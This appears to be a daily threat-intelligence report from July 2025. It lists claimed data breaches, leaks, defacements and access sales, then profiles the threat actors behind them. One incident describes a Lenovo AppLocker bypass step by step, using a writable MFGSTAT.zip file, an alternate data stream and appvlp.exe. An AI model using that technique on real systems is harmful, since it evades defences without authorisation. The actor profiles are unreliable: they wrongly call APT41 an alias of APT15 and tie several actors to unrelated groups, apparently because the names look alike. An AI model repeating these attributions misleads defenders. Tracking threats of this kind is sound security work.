[July-04-2025] Daily Cybersecurity Threat Report

Posted on

1. Executive Summary

This report provides a comprehensive overview of critical cybersecurity incidents observed in the last 24 hours, alongside in-depth analysis of prominent threat actors and evolving attack methodologies. The current threat landscape is characterized by a notable convergence of tactics between financially motivated cybercriminals and nation-state actors, an increasing focus on critical infrastructure, and the rapid exploitation of newly disclosed vulnerabilities. While law enforcement efforts continue to disrupt key cybercrime forums, these disruptions often lead to adaptive shifts in adversary operations. Key actors under scrutiny include state-sponsored entities such as LIUSHEN and the Handala Hack group, financially driven operations like REvil (KrimCo), Pryx (Hellcat), Storm-0539, and the Ghost ransomware group, as well as hacktivist collectives such as TH3 EL1T3 GHOST and Z-PENTEST ALLIANCE.

2. Daily Incident Overview

This section details each cybersecurity breach reported, offering essential context and direct links to supporting evidence.

  • Incident 1: Alleged database sale of AKB48
  • Affected Entity/Sector: AKB48 (Music Industry), Japan
  • Attack Type: Data Breach
  • Primary Threat Actor(s): LIUSHEN
  • Initial Impact: A threat actor claims to be selling a database from AKB48. The compromised data reportedly includes 2.9 GB of membership and user-related records, provided in XLSX, PDF, and DOC formats.
  • Supporting Links:
  • Affected Entity/Sector: Crypto Users (Various Platforms)
  • Attack Type: Data Leak
  • Primary Threat Actor(s): KrimCo
  • Initial Impact: The threat actor claims to have leaked a dataset named “Have I Been Drained Crypto (HIBD)”, which allegedly merges multiple previously exposed public crypto-related databases into one. The compilation reportedly includes data from prominent platforms such as Cointracker, Chainlink, Binance (US), Gemini, and more. The post includes email addresses, full names, phone numbers, wallet addresses, physical addresses, and partial identification information. The files are distributed through third-party hosting services.
  • Supporting Links:
  • Affected Entity/Sector: Subway (Restaurants), Guatemala
  • Attack Type: Data Breach
  • Primary Threat Actor(s): CrakX_Combo
  • Initial Impact: A threat actor claims to be selling a database allegedly belonging to Subway. The compromised data reportedly includes 3,786,863 records containing information such as first and last names, transaction IDs, restaurant names, unhashed employee usernames and passwords, roles, email addresses, codes, quantities, document and transaction numbers, user details, and timestamps. The total uncompressed data size is approximately 360MB. Note: Subway had previously fallen victim to a LockBit ransomware attack on January 21, 2024.
  • Supporting Links:
  • Affected Entity/Sector: Rod Gill Photography (Photography), Australia
  • Attack Type: Defacement
  • Primary Threat Actor(s): TH3 EL1T3 GHOST
  • Initial Impact: The group claims to defaced the website of Rod Gill Photography.
  • Supporting Links:
  • Affected Entity/Sector: Blanceran Village Government (Government Administration), Indonesia
  • Attack Type: Defacement
  • Primary Threat Actor(s): TH3 EL1T3 GHOST
  • Initial Impact: The group claims to defaced the website of Blanceran Village Government.
  • Supporting Links:
  • Affected Entity/Sector: Eden Farm Wellness (Agriculture & Farming), Australia
  • Attack Type: Defacement
  • Primary Threat Actor(s): TH3 EL1T3 GHOST
  • Initial Impact: The group claims to defaced the website of Eden Farm Wellness.
  • Supporting Links:
  • Affected Entity/Sector: Samudera Digital (Software Development), Indonesia
  • Attack Type: Defacement
  • Primary Threat Actor(s): TH3 EL1T3 GHOST
  • Initial Impact: The group claims to defaced the website of Samudera Digital.
  • Supporting Links:
  • Affected Entity/Sector: South Breeze School BD (Education), Bangladesh
  • Attack Type: Data Breach
  • Primary Threat Actor(s): RXY
  • Initial Impact: A threat actor claims to be selling the database from South Breeze School Bangladesh. The compromised data reportedly includes student records containing passport numbers, names, dates of birth, addresses, parent contact details, email addresses, academic qualifications, and payment status.
  • Supporting Links:
  • Affected Entity/Sector: Vodafone (Network & Telecommunications), India
  • Attack Type: Data Breach
  • Primary Threat Actor(s): Team_CRO
  • Initial Impact: A threat actor claims to be selling data from Indian Vodafone. The compromised data reportedly includes 99,936 user records, such as names, phone numbers, email addresses, company names, and more.
  • Supporting Links:
  • Affected Entity/Sector: Unidentified Brazilian Company (Unspecified Industry), Brazil
  • Attack Type: Initial Access
  • Primary Threat Actor(s): Dimitry_S
  • Initial Impact: A threat actor claims to be selling RDP access to an unidentified Brazilian company, protected by Bitdefender antivirus. The access reportedly includes domain management capabilities, over 150 public records, and indicates a revenue of 70 million BRL.
  • Supporting Links:
  • Affected Entity/Sector: Xella Romania (Building and Construction), Romania
  • Attack Type: Initial Access
  • Primary Threat Actor(s): Z-ALLIANCE
  • Initial Impact: A group claims to have gained full access to Trassir surveillance systems at Xella Romania’s warehouse in Bucharest. The breach reportedly includes control over live camera feeds, archived footage, site-related reports, and equipment configurations. Xella Romania is a local branch of the major construction materials group, Xella.
  • Supporting Links:
  • Affected Entity/Sector: Splento Ltd (Photography), UK
  • Attack Type: Data Breach
  • Primary Threat Actor(s): gravity
  • Initial Impact: The threat actor claims to have leaked a 2.2 GB database allegedly from Splento Ltd, a platform that provides professional photography and videography services.
  • Supporting Links:
  • Affected Entity/Sector: Morocco’s Social Insurance (Insurance), Morocco
  • Attack Type: Data Breach
  • Primary Threat Actor(s): Leonsky
  • Initial Impact: A threat actor claims to be selling a database allegedly extracted from Morocco’s social insurance system, containing records from April. The compromised data reportedly includes personal and sensitive details of 2 million users, such as full names, ID numbers, dates of birth, gender, national IDs, phone numbers, email addresses, employer information, insurance status, and contribution history.
  • Supporting Links:
  • Affected Entity/Sector: Niflaot Hatzuna Ltd (Food & Beverages), Israel
  • Attack Type: Data Breach
  • Primary Threat Actor(s): Handala Hack
  • Initial Impact: The group claims to have leaked 220GB of data from Niflaot Hatzuna Ltd which includes procurement orders, delivery logs, staff lists, invoices, kitchen schedules.
  • Supporting Links:
  • Affected Entity/Sector: Tlalnepantla (Government Administration), Mexico
  • Attack Type: Data Breach
  • Primary Threat Actor(s): M3xTr1x02
  • Initial Impact: The threat actor claims to have leaked data related to TLALNEPANTLA, including limited extracted information.
  • Supporting Links:
  • Affected Entity/Sector: Raqamli hukumat (Government Administration), Uzbekistan
  • Attack Type: Data Breach
  • Primary Threat Actor(s): Darkfirefox
  • Initial Impact: The threat actor claims to have breached the data of Raqamli hukumat. The compromised data consists of name, email, password, phone numbers, etc.
  • Supporting Links:
  • Affected Entity/Sector: Web3 Conferences (Unspecified Industry)
  • Attack Type: Data Leak
  • Primary Threat Actor(s): MartinL
  • Initial Impact: The threat actor claims to have leaked data from events and major Web3 conferences, including valuable contact information.
  • Supporting Links:
  • Affected Entity/Sector: Schrödinger (Software Development), USA
  • Attack Type: Data Breach
  • Primary Threat Actor(s): _Sentap
  • Initial Impact: The threat actor claims to be selling a 9GB internal dataset allegedly stolen from Schrödinger GmbH, the German branch of the global computational chemistry firm Schrödinger, Inc. The dataset spans from 2018 to 2025 and includes sensitive financial invoices, employee expense reports, SEPA payment records, legal contracts, scientific collaborations (notably with Merck KGaA), and operational documents across Germany, France, and Switzerland. It also contains personal identifiers, banking details, and strategic insights relevant to marketing, logistics, IT, and telecom operations.
  • Supporting Links:
  • Affected Entity/Sector: Unidentified Consumer Services Firm (Consumer Services), UK
  • Attack Type: Initial Access
  • Primary Threat Actor(s): C3FaRiR
  • Initial Impact: The threat actor claims to be selling RDP access with admin-level privileges to a UK-based organization operating in the consumer services sector. The access includes over 90 systems, one domain controller, and one domain trust. The compromised systems allegedly contain numerous scanned documents.
  • Supporting Links:
  • Affected Entity/Sector: Unidentified Accounting Firm (Accounting), UK
  • Attack Type: Initial Access
  • Primary Threat Actor(s): C3FaRiR
  • Initial Impact: The threat actor claims to be selling RDP access with domain user rights of an unidentified UK-based certified accounting firm. The access includes over 55 systems, one domain controller, and one domain trust. The actor states the network holds 2TB of sensitive data, including bank statements, payroll records, and tax documents.
  • Supporting Links:
  • Affected Entity/Sector: Russian Military Unit 11387 (Military Industry), Russia
  • Attack Type: Data Leak
  • Primary Threat Actor(s): whiterose
  • Initial Impact: The threat actor claims to be selling a leaked database from Russian Military Unit 11387, which allegedly contains 7,947 records of highly sensitive internal personnel data. The database is said to be in.dt format, sized at 250MB compressed (7GB uncompressed), and includes detailed information such as full names, dates of birth, personal numbers, SNILS (Russian Social Security Numbers), military ranks, positions, unit assignments, service status, subdivisions, biometric data (including fingerprints), and clear face photos of individuals.
  • Supporting Links:
  • Affected Entity/Sector: Telefónica Argentina (Network & Telecommunications), Argentina
  • Attack Type: Data Breach
  • Primary Threat Actor(s): injectioninferno
  • Initial Impact: The threat actor claims to have leaked a database from telefonica.com.ar containing 1,200,025 records.
  • Supporting Links:
  • Affected Entity/Sector: FGTS (Government & Public Sector), Brazil
  • Attack Type: Data Breach
  • Primary Threat Actor(s): injectioninferno
  • Initial Impact: The threat actor claims to have breached the data of FGTS website in Brazil. The compromised data consists of 1.5 Million lines of data.
  • Supporting Links:
  • Affected Entity/Sector: OpenSSH (Unspecified Industry)
  • Attack Type: Vulnerability
  • Primary Threat Actor(s): l33tfg
  • Initial Impact: The threat actor claims to have discovered and exploited a zero-day buffer overflow vulnerability in the portable version of OpenSSH_10.0p2. They assert that the flaw resides in the packet.c file of the OpenSSH source code and have shared technical details.
  • Supporting Links:
  • Affected Entity/Sector: Lenovo (Information Technology (IT) Services)
  • Attack Type: Vulnerability
  • Primary Threat Actor(s): xrahitel
  • Initial Impact: The threat actor claims to have exploited a vulnerability involving a writable file located in the Windows directory on Lenovo machines. The file, C:\Windows\MFGSTAT.zip, was found to have improper permissions, allowing any authenticated user to write to it. This misconfiguration can be abused to bypass AppLocker, as default rules typically allow execution from within the Windows directory. By adding a binary such as autoruns.exe as an alternate data stream to the ZIP file and executing it using a trusted Microsoft-signed binary (appvlp.exe), an attacker can evade application whitelisting without requiring administrative privileges. Originally discovered in 2019 and re-verified on newer Lenovo devices in 2025, the issue appears to affect multiple models running Lenovo’s default Windows image. Lenovo has acknowledged the issue and issued guidance recommending removal of the MFGSTAT.zip file rather than releasing a patch. This case underscores the importance of reviewing filesystem permissions in trusted directories when deploying or managing AppLocker in enterprise environments.
  • Supporting Links:
  • Affected Entity/Sector: UK Car Insurance Members (Insurance), UK
  • Attack Type: Data Leak
  • Primary Threat Actor(s): DigitalGhost
  • Initial Impact: A threat actor claims to have leaked data of 150K UK car insurance members. The exposed records include names, email addresses, phone numbers, postcodes, and loan application statuses.
  • Supporting Links:
  • Affected Entity/Sector: BPJS Kesehatan (Government & Public Sector), Indonesia
  • Attack Type: Data Breach
  • Primary Threat Actor(s): MR4cX
  • Initial Impact: The threat actor claims to be selling a BPJS Health (Indonesia) database; the compromised data include full names, addresses, and BPJS identification numbers.
  • Supporting Links:
  • Affected Entity/Sector: Claro (Network & Telecommunications), Argentina
  • Attack Type: Data Breach
  • Primary Threat Actor(s): injectioninferno
  • Initial Impact: The threat actor claims to have leaked a database allegedly belonging to Claro Argentina, a major telecommunications provider. The dump reportedly contains over 1.1 million lines of data, though specific fields are not detailed.
  • Supporting Links:
  • Affected Entity/Sector: Russian Federation on the Sale of State and Municipal Property (Government Administration), Russia
  • Attack Type: Data Breach
  • Primary Threat Actor(s): DigitalGhost
  • Initial Impact: The threat actor claims to be leaked 500K data from Official website of the Russian Federation on the sale of state and municipal property.
  • Supporting Links:
  • Affected Entity/Sector: Caisse Primaire d’Assurance Maladie (Government Administration), France
  • Attack Type: Data Breach
  • Primary Threat Actor(s): zdclub
  • Initial Impact: A threat actor claims to be selling data from the French CPAM (Caisse Primaire d’Assurance Maladie), alleging the current lot contains over 300,000 unique and unused records. The actor also claims the dataset is scalable to up to 5 million entries on demand. The data reportedly includes full names, dates of birth, street-level addresses, zip codes, cities, phone numbers (mobile and landline), national ID (INSEE) numbers, and other personal information.
  • Supporting Links:
  • Affected Entity/Sector: Amextransport (Unspecified Industry), India
  • Attack Type: Defacement
  • Primary Threat Actor(s): Liwaa Muhammad
  • Initial Impact: The group claims to defaced the website of amextransport.in.
  • Supporting Links:
  • Affected Entity/Sector: UAE (Unspecified Industry), UAE
  • Attack Type: Data Leak
  • Primary Threat Actor(s): CKD69
  • Initial Impact: The threat actor claims to be selling sensitive Emirati data, which allegedly includes passports, ID cards, phone numbers, and information related to UAE government websites and major companies in the country.
  • Supporting Links:
  • Affected Entity/Sector: Unspecified (Unspecified Industry), USA
  • Attack Type: Data Leak
  • Primary Threat Actor(s): esgod
  • Initial Impact: The threat actor claims to be selling 3,500 U.S. credit cards, with compromised data including the card’s expiry date (exp), CVV, cardholder name, address, phone number, email, and other personally identifiable information.
  • Supporting Links:
  • Affected Entity/Sector: STAR Insurance (Insurance), Tunisia
  • Attack Type: Data Leak
  • Primary Threat Actor(s): mecrobyte
  • Initial Impact: The threat actor claims to have leaked internal documents from STAR (Société Tunisienne d’Assurances et de Réassurances), a Tunisian insurance and reinsurance provider.
  • Supporting Links:
  • Affected Entity/Sector: Unspecified (Unspecified Industry), USA
  • Attack Type: Data Leak
  • Primary Threat Actor(s): USDeez
  • Initial Impact: A threat actor claims to have leaked an 8M-record USA Business & Investor Database (263 GB). The data includes company names, contact info, addresses, employee sizes, sales volumes, SIC codes, and business descriptions.
  • Supporting Links:
  • Affected Entity/Sector: Indian Journal of Practical Pediatrics (Healthcare & Pharmaceuticals), India
  • Attack Type: Data Breach
  • Primary Threat Actor(s): RXY
  • Initial Impact: The threat actor claims to be selling the database of the Indian Journal of Practical Pediatrics. The exposed data includes personally identifiable information (PII) of numerous medical professionals such as names, designations, registration numbers, addresses, mobile numbers, and email IDs.
  • Supporting Links:

Table 1: Daily Incident Summary

This table provides a quick, at-a-glance overview of all reported incidents for rapid assessment by security leaders and operational teams. It allows for immediate identification of the most critical or relevant events.

Incident IDDate ReportedTarget Sector/EntityAttack TypePrimary Threat ActorKey Impact
12025-07-04T12:01:07ZAKB48 (Music), JapanData BreachLIUSHEN2.9 GB of membership and user-related records for sale.
22025-07-04T11:55:20ZCrypto Users (Various Platforms)Data LeakKrimCoMerged crypto-related databases (emails, names, phones, wallets, addresses, partial IDs).
32025-07-04T11:24:37ZSubway (Restaurants), GuatemalaData BreachCrakX_Combo3.7M records including names, transaction IDs, unhashed employee credentials, emails, etc.
42025-07-04T11:07:05ZRod Gill Photography (Photography), AustraliaDefacementTH3 EL1T3 GHOSTWebsite defacement.
52025-07-04T11:06:45ZBlanceran Village Government (Government Administration), IndonesiaDefacementTH3 EL1T3 GHOSTWebsite defacement.
62025-07-04T11:06:24ZEden Farm Wellness (Agriculture & Farming), AustraliaDefacementTH3 EL1T3 GHOSTWebsite defacement.
72025-07-04T11:05:59ZSamudera Digital (Software Development), IndonesiaDefacementTH3 EL1T3 GHOSTWebsite defacement.
82025-07-04T11:03:02ZSouth Breeze School BD (Education), BangladeshData BreachRXYStudent records including passport numbers, names, DOB, addresses, parent contacts, emails, academic info, payment status.
92025-07-04T09:57:02ZVodafone (Network & Telecommunications), IndiaData BreachTeam_CRO99,936 user records (names, phone numbers, emails, company names).
102025-07-04T08:34:58ZUnidentified Brazilian Company (Unspecified Industry), BrazilInitial AccessDimitry_SRDP access with domain management capabilities, 150+ public records, 70M BRL revenue.
112025-07-04T08:23:43ZXella Romania (Building and Construction), RomaniaInitial AccessZ-ALLIANCEFull access to Trassir surveillance systems (live feeds, archived footage, reports, configs).
122025-07-04T08:04:27ZSplento Ltd (Photography), UKData Breachgravity2.2 GB database leak.
132025-07-04T08:02:41ZMorocco’s Social Insurance (Insurance), MoroccoData BreachLeonsky2 million user records (names, IDs, DOB, gender, national IDs, phones, emails, employer info, insurance status, contribution history).
142025-07-04T07:34:31ZNiflaot Hatzuna Ltd (Food & Beverages), IsraelData BreachHandala Hack220GB of procurement orders, delivery logs, staff lists, invoices, kitchen schedules.
152025-07-04T06:23:19ZTlalnepantla (Government Administration), MexicoData BreachM3xTr1x02Limited extracted data.
162025-07-04T06:12:39ZRaqamli hukumat (Government Administration), UzbekistanData BreachDarkfirefoxNames, emails, passwords, phone numbers.
172025-07-04T06:08:28ZWeb3 Conferences (Unspecified Industry)Data LeakMartinLValuable contact information from events and major Web3 conferences.
182025-07-04T05:59:33ZSchrödinger (Software Development), USAData Breach_Sentap9GB internal dataset (financial invoices, expense reports, SEPA payments, contracts, collaborations, PII, banking details, strategic insights).
192025-07-04T05:41:21ZUnidentified Consumer Services Firm (Consumer Services), UKInitial AccessC3FaRiRRDP access with admin privileges to 90+ systems, domain controller, domain trust, scanned documents.
202025-07-04T05:36:27ZUnidentified Accounting Firm (Accounting), UKInitial AccessC3FaRiRRDP access with domain user rights to 55+ systems, domain controller, domain trust, 2TB sensitive data (bank statements, payroll, tax docs).
212025-07-04T04:53:10ZRussian Military Unit 11387 (Military Industry), RussiaData Leakwhiterose7,947 records of sensitive internal personnel data (names, DOB, personal numbers, SNILS, ranks, positions, unit assignments, service status, biometrics, face photos).
222025-07-04T04:21:08ZTelefónica Argentina (Network & Telecommunications), ArgentinaData Breachinjectioninferno1,200,025 records.
232025-07-04T04:19:22ZFGTS (Government & Public Sector), BrazilData Breachinjectioninferno1.5 Million lines of data.
242025-07-04T04:15:12ZOpenSSH (Unspecified Industry)Vulnerabilityl33tfgZero-day buffer overflow vulnerability in OpenSSH_10.0p2.
252025-07-04T04:14:43ZLenovo (Information Technology (IT) Services)VulnerabilityxrahitelAppLocker bypass via writable C:\Windows\MFGSTAT.zip file with improper permissions.
262025-07-04T04:00:54ZUK Car Insurance Members (Insurance), UKData LeakDigitalGhost150K records (names, emails, phones, postcodes, loan application statuses).
272025-07-04T04:00:13ZBPJS Kesehatan (Government & Public Sector), IndonesiaData BreachMR4cXFull names, addresses, and BPJS identification numbers.
282025-07-04T03:57:36ZClaro (Network & Telecommunications), ArgentinaData BreachinjectioninfernoOver 1.1 million lines of data.
292025-07-04T03:45:19ZRussian Federation on the Sale of State and Municipal Property (Government Administration), RussiaData BreachDigitalGhost500K data leaked.
302025-07-04T02:38:08ZCaisse Primaire d’Assurance Maladie (Government Administration), FranceData BreachzdclubOver 300,000 unique and unused records (names, DOB, addresses, phones, national ID, PII).
312025-07-04T02:32:08ZAmextransport (Unspecified Industry), IndiaDefacementLiwaa MuhammadWebsite defacement.
322025-07-04T01:46:07ZUAE (Unspecified Industry), UAEData LeakCKD69Passports, ID cards, phone numbers, info related to UAE government websites and major companies.
332025-07-04T00:53:26ZUnspecified (Unspecified Industry), USAData Leakesgod3,500 U.S. credit cards (expiry, CVV, cardholder name, address, phone, email, PII).
342025-07-04T00:48:40ZSTAR Insurance (Insurance), TunisiaData LeakmecrobyteInternal documents.
352025-07-04T00:28:27ZUnspecified (Unspecified Industry), USAData LeakUSDeez8M-record USA Business & Investor Database (company names, contact info, addresses, employee sizes, sales volumes, SIC codes, business descriptions).
362025-07-04T00:05:23ZIndian Journal of Practical Pediatrics (Healthcare & Pharmaceuticals), IndiaData BreachRXYPII of medical professionals (names, designations, registration numbers, addresses, mobile numbers, email IDs).

This section provides in-depth profiles of the threat actors identified in the incidents, drawing from the provided intelligence to offer comprehensive context on their motivations, tactics, techniques, and procedures (TTPs), and historical activities.

3.1. LIUSHEN (Aliases: APT15, UNC5174, PurpleHaze)

LIUSHEN is identified as a China-nexus threat actor, with some of its attack clusters, such as PurpleHaze, overlapping with known Chinese cyber espionage groups like APT15 and UNC5174.1 Further intelligence indicates that APT41, an alias for APT15, is believed to operate from Chengdu, China, with alleged ties to China’s Ministry of State Security.2

The primary motivation behind LIUSHEN’s activities is state-sponsored espionage, specifically focusing on the theft of intellectual property that aligns with China’s strategic five-year plans. However, this group also engages in financially motivated cybercriminal operations, including digital extortion, and has notably targeted the video game industry and virtual currency entities, often deploying ransomware.2 This dual operational capability, encompassing both intelligence gathering and financial crime, complicates attribution efforts. A ransomware attack, for instance, might appear to be purely criminal, yet it could be state-backed, providing both funding and a layer of plausible deniability. This blurring of traditional distinctions between nation-state and cybercrime operations presents a significant challenge for defenders in accurately categorizing threats and allocating resources effectively.

In terms of TTPs, LIUSHEN leverages operational relay box (ORB) network infrastructure, which is assessed to be operated from China. The group exploits vulnerabilities such as CVE-2024-8963 and CVE-2024-8190 to establish an initial foothold, sometimes even before these vulnerabilities are publicly disclosed. Following a successful compromise, access to the affected systems is often suspected of being transferred to other threat actors.1 LIUSHEN has targeted over 70 organizations across diverse sectors, including manufacturing, government, finance, telecommunications, and research. An IT services and logistics company responsible for managing hardware logistics for SentinelOne employees was among their victims in early 2025.1

3.2. KrimCo (Aliases: Sodinokibi, REvil, Gold Southfield, UNKN, Unknown, White Ursia)

KrimCo is strongly associated with the Sodinokibi/REvil ransomware operations, with some research suggesting connections to the GandCrab ransomware group.3 The group’s primary motivation is financial gain, operating under a Ransomware-as-a-Service (RaaS) business model. This model allows the core developers to profit from ransomware operations without directly conducting the attacks, thereby increasing their reach and providing a layer of deniability. KrimCo employs double extortion tactics, threatening to publish stolen data if the ransom demand is not met.3

A notable TTP of KrimCo is its practice of aborting ransomware attacks if certain languages, predominantly Russian, CIS (Commonwealth of Independent States), and Syrian Arabic, are detected on the victim’s system. This geographical exclusion suggests an implicit understanding or directive to avoid targeting entities within specific geopolitical regions, potentially to evade domestic law enforcement or align with broader state interests. This practice demonstrates that even purely financially motivated groups can have geopolitical considerations influencing their operations.3 KrimCo has a history of publicly naming victims and releasing stolen information on their leak sites, such as the “Happy Blog,” as observed with Artech Information Systems in January 2020.3

3.3. TH3 EL1T3 GHOST (Alias: Ghost Squad Hackers – GSH)

TH3 EL1T3 GHOST, also known as Ghost Squad Hackers (GSH), is a hacktivist group that operates as part of the broader Anonymous collective. The group is reportedly led by a figure known as “s1ege”.4 Their motivations are primarily political and ideological, with actions often driven by responses to perceived injustices, racism, or as protests against specific governments or organizations.4

GSH’s TTPs include Distributed Denial of Service (DDoS) attacks, website defacements, and data leaks. They coordinate their operations and amplify the impact of their activities through social media platforms.4 This group has demonstrated a wide-ranging targeting strategy, affecting diverse sectors and entities. Notable historical activities include targeting central banks as part of “Operation Icarus,” media outlets like Fox News and CNN during “OpSilence,” and the United States Armed Forces, resulting in the leakage of military personnel files. They have also targeted the government of Israel, leaking Israeli Defense Force (IDF) data, and have launched attacks against Donald Trump’s official websites, the Ku Klux Klan, and even Black Lives Matter.4 This demonstrates that hacktivist groups, while sometimes perceived as less sophisticated than nation-states, can cause significant disruption and reputational damage across a wide array of sectors, driven by diverse and often rapidly shifting ideological agendas. Their willingness to target both state and non-state entities, and even social movements they disagree with, highlights the unpredictable nature of hacktivism.

3.4. Pryx (Aliases: HolyPryx, Sp1d3r)

Pryx is an active malware and ransomware developer and an identity access broker, operating across various cybercrime platforms including XSS, BreachForums, Dread, Telegram, and X (formerly Twitter). Pryx claims to be 17 years old and is associated with prominent threat actors such as IntelBroker and members of the “Five Families” hacking alliance.5 Pryx leads the Hellcat ransomware group, which is also known as Morpheus ransomware.

Pryx’s motivations are a mix of financial opportunity and political objectives. The actor is known for being strongly anti-Israel and has stated that their primary focus is the government sector, driven by political motives.5 Pryx also seeks to establish a reputation as a notorious and reputable threat actor within the cybercrime community.5 This combination of advanced technical skill, entrepreneurial drive (forming Hellcat), and clear geopolitical motivation in a young actor signifies an evolving threat landscape where personal ideologies increasingly drive sophisticated cybercrime operations, blurring the lines between traditional criminal and state-sponsored activities.

In terms of TTPs, Pryx develops novel malware, including a “server-side stealer” that establishes a secret Tor service directly on compromised machines to host stolen data, thereby reducing the risk of detection during data exfiltration.5 The Hellcat group employs double-extortion tactics, stealing sensitive data before encrypting it.5 Rey, a co-leader of Hellcat, has been observed exploiting Jira credentials to gain access to sensitive data in various companies.6 Hellcat ransomware has claimed victims such as Schneider Electric, Telefónica, and Orange Romania, indicating Pryx’s escalation from solo attacks to targeting government systems and private companies.6

3.5. Team_CRO (Alias: Hacking Team)

Team_CRO refers to Hacking Team, a Milan-based information technology company founded in 2003. This company specialized in selling offensive intrusion and surveillance capabilities, often referred to as “lawful intercept” tools, to governments, law enforcement agencies, and corporations. In 2019, Hacking Team was acquired by InTheCyber Group and rebranded as Memento Labs.7

The company’s motivation was commercial profit, generating over 40 million Euros in revenue from its clientele.7 Their Remote Control Systems (RCS), including platforms like Da Vinci and Galileo, offered extensive surveillance capabilities. These tools enabled covert collection of emails, text messages, phone call history, and address books, as well as keystroke logging, screen capture, audio/video recording (including Skype calls), remote activation of microphones and cameras, GPS monitoring, UEFI BIOS rootkit infection, and exfiltration of cryptocurrency wallet files. These tools were designed with advanced techniques to avoid detection and minimize battery drain on target devices.7

Hacking Team’s clientele included 70 active customers, predominantly military, police, federal, and provincial governments, alongside corporate clients such as Barclays, British Telecom, and Deutsche Bank.7 A critical controversy arose when their software was reportedly used by corrupt Mexican officials to target and intimidate Mexican journalists on behalf of drug cartels.7 This demonstrates the inherent danger of dual-use technologies, where tools developed for “lawful” purposes can be diverted and misused by illicit actors. Furthermore, Hacking Team suffered a major data breach in 2015, which resulted in the public leakage of over 400 gigabytes of internal data, emails, and source code.7 This breach further exacerbated the risk by potentially putting advanced surveillance capabilities into the hands of a wider array of malicious entities, effectively democratizing sophisticated cyber tools and highlighting broader implications for national security and human rights.

3.6. Storm-0539 (Alias: Atlas Lion)

Storm-0539, also known as Atlas Lion, operates out of Morocco.8 This group is primarily financially motivated, with a focus on gift card fraud and payment card heists. Their objective is to steal gift cards and monetize them by selling them online at discounted rates, with observed thefts reaching up to $100,000 per day at certain companies.8

Active since late 2021, Storm-0539 increases its attack activity ahead of major holiday seasons. Between March and May 2024, Microsoft observed a 30% increase in their intrusion activity.8 Their TTPs are sophisticated, involving extensive social engineering tactics such as phishing and smishing. They register their own devices to victim environments to gain persistent access and bypass multi-factor authentication (MFA) prompts by redirecting them to the attacker’s device. They also leverage access to target third-party organizations. The group operates from free trials, pay-as-you-go subscriptions, and compromised cloud resources, even impersonating legitimate nonprofits to obtain sponsorship from cloud providers.8 The reconnaissance and cloud environment leverage techniques employed by Storm-0539 are similar to those observed from nation-state-sponsored threat actors.8 This demonstrates a professionalization of cybercrime, where financially driven groups adopt advanced techniques typically associated with state actors, requiring organizations to prepare for sophisticated attacks from a broader range of adversaries.

3.7. Handala Hack Group

The Handala Hack Group is a pro-Palestinian hacktivist collective that derives its name and symbol from Handala, a character created by Palestinian political cartoonist Naji al-Ali.9 This group is linked to Iran’s Ministry of Intelligence (MOIS) and is reportedly operated by a cyber unit within their internal security department, primarily for advertising purposes.10

The group’s motivations are primarily geopolitical, centered on the Israeli-Palestinian conflict and aiming to inflict “the pain of the Palestinians”.9 This consistent linking of Handala Hack to Iran’s MOIS elevates this group beyond typical hacktivism. Their targeting of critical infrastructure, as well as their willingness to engage in highly disruptive and psychologically impactful attacks, demonstrates a strategic intent.

Handala Hack employs sophisticated cyber-attacks, including phishing campaigns (sometimes disguised as F5 security updates), ransomware (utilizing double extortion), website defacements, and the disruption of public address systems.9 They are known to use wipers such as Hamsa Wiper and Hatef Wiper.11 The group frequently releases partial evidence of their successes and uses platforms like Telegram and Twitter for propaganda and real-time reporting of their activities.9 Notable targets include Israeli cybersecurity, critical infrastructure, and citizens. They claimed responsibility for attacks on kindergartens, disrupting public address systems to broadcast pro-terrorism songs and red alert warnings.10 They also claimed to have successfully hacked DRS RADA, a multi-purpose tactical radars company, and the Ma’agan Michael Kibbutz, from which they exfiltrated 22GB of data and sent over 5,000 warning SMS messages.9 Additionally, Handala claimed responsibility for a significant cyber-attack against Zerto, a Hewlett Packard Enterprise (HPE) subsidiary, alleging the exfiltration and subsequent deletion of a massive 51 terabytes (TB) of data.9 The group also claimed to have breached the Soreq Nuclear Research Center, alleging the theft of 197GB of data and publishing photos purportedly taken inside the facility.10 These actions, including claims of destructive data deletion and the use of wipers, indicate a move towards destructive capabilities rather than just data theft or defacement. This reveals a dangerous trend where state-sponsored entities leverage hacktivist fronts to conduct aggressive cyber operations, blurring lines and potentially escalating conflicts.

3.8. Ghost Ransomware Group (Aliases: Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, Rapture)

The Ghost ransomware group originates from China.12 Its primary motivation is financial gain.14 Active since 2021, this group is characterized by its “hack before we patch” strategy, exploiting well-known vulnerabilities in outdated software and firmware on internet-facing services.12

Ghost actors obtain initial access to networks by exploiting public-facing applications associated with multiple CVEs, including vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), Adobe ColdFusion servers (CVE-2010-2861, CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).12 A key operational characteristic is their extensive use of legitimate cybersecurity tools such as Cobalt Strike for access, privilege escalation, and command and control (C2) operations. They upload web shells and use Windows Command Prompt or PowerShell to download and execute Cobalt Strike Beacon malware. For credential access, they leverage Cobalt Strike functions like “hashdump” or Mimikatz, and for privilege escalation, they impersonate the SYSTEM user to run Beacon with elevated privileges. They also disable antivirus software, such as Windows Defender, on network-connected devices.12 This reliance on readily available, legitimate tools makes their activities harder to detect by traditional signature-based defenses. This group thrives on organizational patching delays and leverages common tools, making them a pervasive threat across all sectors, emphasizing the critical need for robust patch management and behavioral detection. Ghost actors typically spend only a few days on victim networks, often proceeding from initial compromise to ransomware deployment within the same day. They rotate ransomware executable payloads, encrypted file extensions, and ransom note text, which has historically led to variable attribution.12 The group has compromised organizations in over 70 countries, including critical infrastructure, healthcare, schools, universities, government networks, religious institutions, technology, manufacturing companies, and small- and medium-sized businesses.12

3.9. _Sentap

_Sentap operates on the predominantly Russian-speaking dark web forum xss.15 This actor is primarily financially motivated, seeking to profit from selling compromised data.15

